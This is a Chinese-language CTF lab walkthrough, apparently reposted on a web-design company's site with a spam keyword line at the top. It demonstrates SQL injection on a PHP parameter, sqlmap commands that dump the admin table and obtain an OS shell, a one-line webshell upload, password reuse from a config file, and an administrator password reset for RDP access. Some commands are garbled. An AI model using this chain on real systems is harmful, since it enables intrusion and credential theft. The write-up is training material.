真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

CTF主機滲透的方法是什么

這篇文章主要介紹了CTF主機滲透的方法是什么的相關知識,內(nèi)容詳細易懂,操作簡單快捷,具有一定借鑒價值,相信大家閱讀完這篇CTF主機滲透的方法是什么文章都會有所收獲,下面我們一起來看看吧。

創(chuàng)新互聯(lián)是一家專業(yè)從事成都網(wǎng)站制作、做網(wǎng)站、外貿(mào)營銷網(wǎng)站建設、網(wǎng)頁設計的品牌網(wǎng)絡公司。如今是成都地區(qū)具影響力的網(wǎng)站設計公司,作為專業(yè)的成都網(wǎng)站建設公司,創(chuàng)新互聯(lián)依托強大的技術實力、以及多年的網(wǎng)站運營經(jīng)驗,為您提供專業(yè)的成都網(wǎng)站建設、營銷型網(wǎng)站建設及網(wǎng)站設計開發(fā)服務!

第一步:首先打開連接地址: http://202.0.0.207

第二步:尋找漏洞點,點擊頁面的時候,我們看到是PHP的網(wǎng)站,以及url中的參數(shù)名為cid,那我們可以使用sql注入試試,看是否存在sql注入漏洞

CTF主機滲透的方法是什么

我們使用手工判斷方法:

http://202.0.0.207/product.php?cid=3’, 頁面異常

CTF主機滲透的方法是什么

http://202.0.0.207/product.php?cid=3 and 1=1,正常

CTF主機滲透的方法是什么

http://202.0.0.207/product.php?cid=3 and 1=2,異常

CTF主機滲透的方法是什么

從而判斷此處一定存在sql注入漏洞,且參數(shù)類型為整型。

這里我們可以使用盲注來手工注入。因為sqlmap也支持盲注類型,所有為了節(jié)約時間我們就使用sqlmap來脫庫吧!

第二步:使用sqlmap來脫庫

sqlmap -u http://202.0.0.207/product.php?cid=3

CTF主機滲透的方法是什么

此參數(shù)爆出時間盲注和聯(lián)合注入攻擊可以實現(xiàn)。

接下來我們直接開始跑庫吧

sqlmap -u http://202.0.0.207/product.php?cid=3 –dbs

CTF主機滲透的方法是什么

我們選擇510cms數(shù)據(jù)庫來爆吧

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms –tables

CTF主機滲透的方法是什么

再來爆510_admin試試

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin --columns

 CTF主機滲透的方法是什么

接下來爆數(shù)據(jù)

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin -C id,mid,name,passwd,remark –dump

CTF主機滲透的方法是什么

然后我們想要admin用戶的密碼:8dbdf8221fcf4bd6ac5a48317baa948c,在線MD5解密后得到密碼為adminlwphp

CTF主機滲透的方法是什么

第三步:我們接下來就去找后臺登錄頁面了

這里我使用御劍后臺掃描器CTF主機滲透的方法是什么 

CTF主機滲透的方法是什么

首先我們還是看登錄頁面的源碼,看是不是有flag,果然如此,在這里拿到一個flag3{d3eac3a68b7d3863cc7bd45ba948195d}

CTF主機滲透的方法是什么

接下來我們使用爆庫出來的管理員賬戶和密碼登錄:admin/ adminlwphp,登錄成功

CTF主機滲透的方法是什么

第四步:胡亂搗騰

進入后臺后,現(xiàn)在也只有到處去收集有用信息,看下有沒有直接拿flag的地方了。一不小心,突然看到了網(wǎng)站絕對路徑C:/www/,那根據(jù)前面爆出的sql注入漏洞,我們能不能拿到cmdshell呢?我們接下來嘗試一下

sqlmap -u http://202.0.0.207/product.php?cid=3 --os-shell

CTF主機滲透的方法是什么

果然拿到了cmdshell,真XX是一個驚喜,那么我們接下就看下現(xiàn)在擁有的系統(tǒng)權限是什么

CTF主機滲透的方法是什么

第五步:一句話木馬上傳及利用

接下來就直接寫入一句話木馬了

echo ^>C:/WWW/shell.php

CTF主機滲透的方法是什么

接下來我們上菜刀工具

CTF主機滲透的方法是什么

連接成功

CTF主機滲透的方法是什么

第六步:胡亂搗騰

下面看到這么多頁面心頭就開始發(fā)慌,又得漫山遍野的去收集flag了,

在網(wǎng)站根目錄發(fā)現(xiàn)flag.php文件,發(fā)現(xiàn)flag1=flag1{6ab7c0c46b171d04f1cab922c2f9f017}

CTF主機滲透的方法是什么

花了10多分鐘,再也沒有找到flag,那只有想其他的辦法了。在configs中找到config.php,這個是數(shù)據(jù)庫的配置文件,我們得到了數(shù)據(jù)庫連接的賬戶root密碼為windpasssql

CTF主機滲透的方法是什么

我們使用菜刀對數(shù)據(jù)庫進行連接

CTF主機滲透的方法是什么

提交后,連接成功

CTF主機滲透的方法是什么

繼續(xù)看這里有沒有flag,又拿到一個flag=flag2{981c05134c56092b83b3e9c9b4116ac1}

CTF主機滲透的方法是什么

我們使用菜刀工具進入虛擬終端,看下目前的權限是什么,需要提權不?結果發(fā)現(xiàn)是system權限,

CTF主機滲透的方法是什么

執(zhí)行命令netstat -an查看3389端口已經(jīng)開啟

CTF主機滲透的方法是什么

et user administrator godun.f

修改管理員密碼為godun.f,

CTF主機滲透的方法是什么

然后遠程桌面登錄遠程主機

拿到flag=flag4{e97950cb2dea110c53cb599abc826268}

拿到了4個flag,還有一個不知道藏在哪里,我們還得繼續(xù)找,找了半天,最后在,C盤的根目錄下找到了flag5{c3bc1e7b8325d75816e1ca8ae5ae72ad}

最后,到此為止,5個flag全部找出來了,接下來我們把5個flag放入答題框

關于“CTF主機滲透的方法是什么”這篇文章的內(nèi)容就介紹到這里,感謝各位的閱讀!相信大家對“CTF主機滲透的方法是什么”知識都有一定的了解,大家如果還想學習更多知識,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道。


分享標題:CTF主機滲透的方法是什么
文章鏈接:http://weahome.cn/article/jhidci.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部